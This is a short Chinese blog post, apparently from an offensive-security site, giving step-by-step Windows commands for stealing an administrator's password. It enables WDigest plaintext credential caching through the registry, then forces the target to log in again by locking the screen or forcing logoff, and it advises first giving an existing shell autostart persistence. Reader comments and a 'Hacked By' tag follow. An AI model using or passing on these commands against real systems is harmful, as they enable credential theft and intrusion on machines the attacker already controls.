修改注册表
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
选项一:锁屏
rundll32.exe user32.dll,LockWorkStation
选项二:注销
查询已登录用户的会话ID
query user
把你想抓的那个管理员注销掉或者把所有在线用户全部注销掉,注意:可能会导致shell无法访问,执行前先给shell加个自启动
logoff ID
参考文章
http://www.ansbase5.info/?p=136
http://blog.51cto.com/tianma3798/1735409
备注:强烈推荐注销!
版权声明:本文为原创文章,版权归 Fire ant 所有。
本文链接:https://www.luolikong.vip/index.php/archives/408/
转载时须注明出处及本声明
兄弟写的非常好 https://www.cscnn.com/
我的QQ是 609267976 谢谢大佬
OωO大佬,可以留个联系方式吗,想学习交流下.
Hacked By:dajiba